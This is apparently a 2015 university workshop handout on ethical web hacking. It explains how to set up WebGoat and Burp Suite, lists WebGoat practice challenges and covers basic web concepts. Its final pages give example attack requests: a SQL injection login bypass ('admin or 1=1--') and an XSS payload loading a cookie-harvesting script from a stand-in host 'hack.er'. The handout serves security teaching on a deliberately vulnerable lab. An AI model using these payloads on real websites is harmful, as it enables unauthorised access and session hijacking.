Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e
Downloading WebGoat and Burp Suite System Requirements Computer and operating system: Macintosh (with Intel processor): Mac OS X 10.8 or higher Windows: Windows Vista, Windows 7 or Windows 8 GNU / Linux: Ubuntu 12.04 or higher Browser: Mozilla Firefox 32 or higher recommended Note: If you are using Firefox with the NoScript extension, you ll need to turn the extension off. Step 1: Install Java Software Java is required in order to run WebGoat and the Burp Proxy java applets. If Java software isn t currently installed on the computer, visit the following link: http://java.com/en/download/help/download_options.xml Please click on the link on the web page that is appropriate for your PC s operating system and follow the instructions to download and install Java. Step 2: Download Burp Suite Free Please visit (http://portswigger.net/burp/downloadfree.html) to download the latest version of Burp Suite Free (7.4 MB download) Step 3: Download WebGoat 6 Please visit (https://github.com/webgoat/webgoat-legacy/releases) and scroll down to download the two WebGoat files - WebGoat-6.0.1-war-exec.jar and WebGoat-6.0.1.war (100 MB download). 2 P a g e
Setting up the environment Step 1: Run WebGoat 6 Double-Click on WebGoat-6.0.1-war-exec.jar to load WebGoat in the background. Note that you should not see anything open. Step 2: Access the WebGoat Page Open Firefox and connect to http://localhost:8080/webgoat/login.mvc The WebGoat Login page then appears as below, and you can log in using the guest or webgoat account Step 3: Run Burp Suite Proxy Double-Click on burpsuite_free_v1.6.01.jar to open the Burp Proxy 3 P a g e
Configuring Burp to work with your browser In this step we will configure your web browser to work with Burp. Burp operates as a man-in-the-middle between your browser and target web applications. Therefore, we need to configure your browser so that Burp can intercept its traffic. NOTE: We strongly recommend that you apply these steps to the FireFox web browser, as modifying the proxy settings for Chrome, Safari and Internet Explorer may prevent other applications from accessing the internet. Step 1: Open Firefox with a new blank tab This is to ensure that we don t get flooded with unwanted requests from other websites when Intercept mode is on. Step 2: Configure Burp Proxy to listen through port 8081 First, we want to confirm that Burp s proxy listener is active and working. Go to the Proxy tab, then the Options sub-tab and look in the Proxy Listeners section. You should see an unchecked entry in the table for 127.0.0.1:8080 as seen in the screen below Since WebGoat is using port 8080, we need to change the settings so that Burp uses the free 8081 port. 4 P a g e
Under the Proxy Listeners section, click on the left Edit button. Change the Bind to port: to 8081 and click on OK Then, under the Running column, ensure that you check the box to the left of 127.0.0.1:8081 like the screenshot below The Burp Proxy has now been configured correctly. 5 P a g e
Step 3: Configuring Firefox to work with Burp In Firefox, go to the Firefox Menu. Then, click on Tools (or Preferences in older versions). Next, click on the Advanced tab, then select the Network tab. Under the Network tab, click on the Settings button in the Connection section. Select the Manual proxy configuration option. Then, enter your Burp Proxy listener address in the HTTP Proxy field (127.0.0.1). Next, enter your Burp Proxy listener port in the Port field (8081). Then, ensure that the Use this proxy server for all protocols box is checked. 6 P a g e
Finally, delete anything that appears in the No proxy for field, so that it looks like the screenshot below. Click OK to save the changes. Firefox is now configured to work with Burp. Reversing the Firefox Configuration change If you no longer want the Burp Proxy to intercept the traffic from Firefox, then change the Firefox connection settings from Manual Proxy Configuration to No Proxy. An even easier method is to download the TOGGLEPROXY Firefox add-on, which allows you to switch back and forth between using No Proxy settings and the Burp Proxy setting with just a click of a button. Using Burp on HTTPS Sites As the Burp Proxy acts as a man-in-the-middle between your browser and a web application protected, it breaks the SSL connection with a protected web application. Therefore, you need to install Burp s SSL certificate to remove the Untrusted warnings from your browser. Please visit the following link for more information on how to install Burp s CA certificate in Firefox https://support.portswigger.net/customer/portal/articles/1783075- Installing_Installing%20CA%20Certificate.html 7 P a g e
Tips on how to use the Burp Proxy Turn Intercept on only when you want to capture or modify HTTP requests When first using the Burp Proxy, the Intercept is on by default. This prevents you from browsing through a website normally, as the requests are queued by Burp, and have to be manually forwarded by you. If you want to view webpages while using Burp, then you must either manually click on the Forward button or turn off Intercept completely. You can turn off Intercept by clicking on the Intercept is on button, like in the screenshot below: You can view the history of all traffic sent and received by your Browser in Burp After you configure your browser to use Burp as a proxy, all traffic that goes in and out of the web browser is recorded in Burp under the Proxy -> HTTP history tab. This happens even if you turn off the intercept function. This gives you a broad overview of all the web links that you have visited, as well as the HTML and JavaScript code that your web browser processed. 8 P a g e
Challenges in WebGoat Once you have configured WebGoat and Burp Proxy, you are ready to have a crack at a few WebGoat challenges. The following is a list of recommended starter challenges that will put you into the right mind-set for tackling ethical web hacking problems: Access Control Flaws -> Stage 1 As regular employee Tom, exploit weak access control to use the Delete function from the Staff List page. Access Control Flaws -> Stage 3 As regular employee Tom, exploit weak access control to View another employee s profile. Parameter Tampering -> HTML Field Restrictions Bypass the HTML form restrictions for all six fields by submitting six invalid values against their parameters. Authentication Flaws -> Forgotten Password Retrieve the password of another user by abusing the Password Recovery function. Parameter Tampering -> Exploit Hidden Fields Try to purchase the HDTV for less than the purchase price Concurrency -> Shopping Cart Concurrency Flaw Exploit the application s vulnerable handling of multiple HTTP requests to purchase the Sony laptop for a lower price Authentication Flaws -> Multi Level Login 1 Trick the web application to log you in as someone else Method 1 Authentication Flaws -> Multi Level Login 2 Trick the web application to log you in as someone else Method 2 Injection Flaws -> Stage 1: String SQL Injection As regular employee Larry use SQL injection into a parameter of the View function (from the List Staff page) to view the profile of the boss Neville Injection Flaws -> Stage 3: Numeric SQL Injection Use string SQL injection on the login page to bypass authentication and log in as the boss Neville Cross Site Scripting -> Stage 1: Stored XSS As regular employee Tom, execute a Stored XSS attack against the Street field on the Edit Profile page. Verify that the user Jerry is affected by the attack. Cross Site Scripting -> Stage 5: Reflected XSS Execute a Reflected XSS attack by using a vulnerability on the Search Staff page. 9 P a g e
Basic Concepts IP Address A unique number assigned to your computer connection by your internet service provider (external IP) or your network router (internal IP). It functions a bit like your street address, so if someone wants to send you mail, your address is needed for the delivery person to find your home. In the case of your computer, your IP address is used to route information from the internet to your computer. 216.58.220.142 is an example of an IPv4 address. FE80:0000:0000:0000:0202:B3FF:FE1E:8329 is an example of an IPv6 address. URL - Uniform Resource Locator A URL is a standard naming convention used to specify addresses on the internet. An example of a URL can be seen below: Protocol Domain and domain suffix http://www.unitec.ac.nz/home/index.html Sub-domain Directory Web page Web Server Web servers are computers that deliver web pages. Every web server has an IP Address and a domain name. For example, if you type in the URL http://www.unitec.ac.nz in your browser, this sends a request to the Web server whose domain name is unitec.ac.nz. The server then fetches the page named index.html and sends it to your browser. 10 P a g e
HTTP Stands for HyperText Transfer Protocol. This enables the browser to know what protocol (or language) it is going to use to access information that is specified on a domain or a server. SSL Stands for Secure Sockets Layer, and is one of many security protocols that is used on the internet. It is a way to encrypt data that is sent from a web browser to the web server to ensure that it is not tampered with. To use an SSL connection, a public key and a private key are used. The web browser uses the public key (also known as a certificate) to encrypt the data and the web server uses the private key to decrypt the information into something readable. Websites protected with SSL begin with HTTPS (also known as Secure HTTP) rather than HTTP. A more advanced security protocol commonly used today is TLS Transport Layer Security. Cookie A cookie is information that a website puts on your hard disk so that it can remember something about you at a later time. Using the HTTP protocol, your web browser makes independent requests for each web page. This means that the web server has no memory of what pages it has sent to a user previously. For example, when you login to a website such as Facebook, a cookie is created with your unique session ID. Each time you access a page on Facebook, that session ID is passed to the web server in each request so that it knows that you are a legitimate user before returning you a list of your Facebook friends. Network Port A network port is a location or a node where information is sent through. A port number ranges from 0 to 65,535 for which applications and services on a server listen to for incoming packets of data. For example, when you connect to a website, your machine connects to port 80 (for HTTP) or port 443 (for HTTPS) to receive data and display the website. 11 P a g e
HTML Stands for HyperText Markup Language, it is an authoring language used to create documents on the web. HTML documents are described by HTML mark-up tags. An example of HTML code can be seen below: <!DOCTYPE html> <html><head><title>unitec Workshop</title></head> <body> <h1>cyber Security</h1> <p>i am learning about HTML.</p> </body> </html> JavaScript JavaScript is a lightweight programming language (also known as a scripting language) that is interpreted by the web browser engine when a web page is loaded. It is primarily used for adding interactivity to web pages and is a core part of web applications today. An example of JavaScript code can be seen below: <button type="button" onclick="document.getelementbyid('demo').innerhtml = 'Hello Unitec!'"> Click Me Now</button> XML Stands for Extensible Mark-up Language. XML is a set of rules used to describe the content and structure of information. It is a flexible way to create information formats and share this data between applications. An example of XML code can be seen below: <?xml version= 1.0?> <quiz> <question> What is the difference between XML and HTTP? </question> <answer> XML was designed to describe data and to focus on what the data is. HTML was designed to display data and to focus on how the data looks. </answer> </quiz> 12 P a g e
CSS Stands for Cascading Style Sheets. It defines how HTML elements should be displayed and formatted on a web browser. Using a single external CSS file, you can change the look and feel of an entire website instead of changing the code in every single HTML page. CSS shares the same code as HTML. An example of CSS code can be seen below: <!DOCTYPE html> <html> <head> <style> body { background-color: #b0c4de; } </style> </head> <body> <h1>css Heading</h1> <p>this is basically HTML code.</p> </body> </html> SQL Stands for Structured Query Language. It is a standard interactive and programming language for getting information from a relational database, as well making changes or adding additional entries. A database is a collection of information stored in a file. Examples of relational databases include MySQL, Oracle, Microsoft Access and FileMaker Pro. These are programs that allows you to store and retrieve the data as efficiently as possible. If we want to create a table to store information from a survey, we can use the following SQL query: CREATE TABLE SURVEY (ID INTEGER PRIMARY KEY, FIRST_NAME CHAR(20), LAST_NAME CHAR(20), AGE REAL, POST_CODE REAL); If we want to pull the surname of all users who participated in a survey, we can use the following SQL query: SELECT LAST_NAME FROM SURVEY; 13 P a g e
Ethical Web Hacking Concepts HTTP Requests When you type in a URL in your web browser, the browser sends an HTTP request to a web server in the form of a request message. The request message includes a Request Method which tells the webserver what kind of action that you want to perform. For example, the GET method is used to retrieve information from the server, while the POST method is used to send data to the server (e.g. survey information, file uploads etc). HTTP requests also include Request Header Fields which allows an HTTP client such as your browser to pass on additional information about the request, and the client itself, to the server. Example 1 Fetch the index.htm page from a web server running on unitec.ac.nz GET /index.html HTTP/1.1 (Fetch index.html using the HTTP protocol) User-Agent: Mozilla/5.0 (Windows NT 5.2) Firefox/35.0 (This request is coming from a Firefox Web Browser on Windows 8) Host: www.unitec.ac.nz:80 (The web server that I want to connect to is running on www.unitec.ac.nz through port 80) Accept-Language: en-us (My language preferences are English-US) Accept-Encoding: gzip, deflate (Use the gzip compression algorithm to deliver my request faster) Connection: Keep-Alive (Preserve the connection between my web browser and the web server) 14 P a g e
HTTP Requests - Continued Example 2 Send purchase information to a web server running on buystuff.co.nz POST /auction/1243523/ps4?action=buy HTTP/1.1 (Web Server, process the purchase form data and respond accordingly) User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0 (This request is coming from a Firefox Web Browser on Windows 8) Host: www.buystuff.co.nz:80 (The web server that I want to connect to is running on www.buystuff.co.nz through port 80) Referer: http://www.buystuff.co.nz/1243523/ps4 (Here is the address of the previous page that I visited) Content-Type: application/x-www-form-urlencoded (The information that I am sending to you is simple web form data) Content-Length: 32 (The length of the information that I am sending to you in the message body is 32 characters) Accept-Language: en-us (My language preferences are English-US) Accept-Encoding: gzip, deflate (Use the gzip compression algorithm to deliver my request faster) Connection: Keep-Alive (Preserve the connection between my web browser and the web server) QTY=1&Submit=BuyNow&Price=469.97 (I clicked the Buy Now button and want to purchase one PlayStation 4 console for $469.97) 15 P a g e
HTTP Response After receiving and interpreting a request message, the web server then responds with an HTTP response message. The response includes HTML code that is rendered by the Web Browser if the initial request was valid. Example Web Server response for a request to fetch the index.htm page from a web server running on unitec.ac.nz HTTP/1.1 200 OK (The request was successfully received, understood and accepted) Date: Mon, 27 Jul 2015 12:28:53 GMT (This response was sent at this date and time) Server: Apache/2.2.14 (Win32) (The request was processed by the Apache Web Server Software) Content-Length: 88 (The length of the information that you are receiving is 88 characters) Content-Type: text/html (The length of the information that you are receiving is in basic html format) Connection: Closed (Close the connection between the web browser and the web server) <html> <body> <h1>hello, World!</h1> </body> </html> (HTML code for a simple page with a Hello, World! heading) 16 P a g e
SQL Injection SQL injection is one of many injection attacks that hackers use to harvest data from organisations. It is a type of attack that takes advantage of flaws due to improper coding of web applications. Hackers often inject SQL commands into forms to allow them to gain access to the data held within your database. Essentially, SQL injection arises because the fields available for user input allow SQL statements to pass through, giving a hacker the ability to directly communicate with the database. Example A login page where a legitimate user would type in their username & password combination to view their personal information. For a user to log into a form, they type in their username, their password and click on the submit button. This transaction generates a SQL query. The web application then communicates with the database through a series of planned commands to verify the username and password combination. On verification, the user is granted access. However, a hacker could input specifically crafted SQL commands into the forms, with the intent of bypassing the login form and to get unauthorised access to information. Web Browser SQL Injection Web Server Malicious HTTP Request POST /login.php Host: buystuff.co.nz:80 User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0 Referer: http://www.buystuff.co.nz/1243523/ps4 UserName=admin or 1=1--&Password=admin or 1=1--&Submit=Login In the example above, the admin or 1=1-- SQL query means: If the user admin exists, pull information about admin from the database. Or, if the statement 1=1 is true then pull information from each row of the table. Since 1 always equals to 1, each row in the database is evaluated to be true. This results in information from each row of the database to be returned to the user. 17 P a g e
Cross-Site Scripting Cross-Site scripting is one of many injection attacks that hackers use to harvest information from users by targeting vulnerable web sites. It is a type of attack that takes advantage of improper coding of web applications. Cross- Site scripting enables attackers to inject client-side script into web pages viewed by other users. This vulnerability can allow a hacker to harvest information from cookies and bypass access controls. This means a hacker can login as another user without compromising their username and password. Example Exploiting cross-site scripting vulnerability on a shopping site 1) A malicious user injects a script in a legitimate shopping site URL. This then redirects a user to a fake but identical page. 2) The fake page executes a script that reads the cookie of the user browsing the shopping site, and sends that information to the malicious user. Since the cookie contains code for an active login session, the malicious user can now hijack the legitimate user s session. Web Browser Cross-Site Scripting Web Server Malicious HTTP Request POST /login.php HTTP/1.1 Host: buystuff.co.nz User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0 Referer: http://www.buystuff.co.nz/1243523/ps4 UserName=<script src=http://hack.er/harvest_session.js></script>&password=&submit=login In general, cross-site scripting is not considered as an actual hack against websites, but it is used to exploit a scripting weakness in the page to take control of a user s session. Users can be lured by URLs in a phishing email that contains code to exploit a cross-site scripting vulnerability. 18 P a g e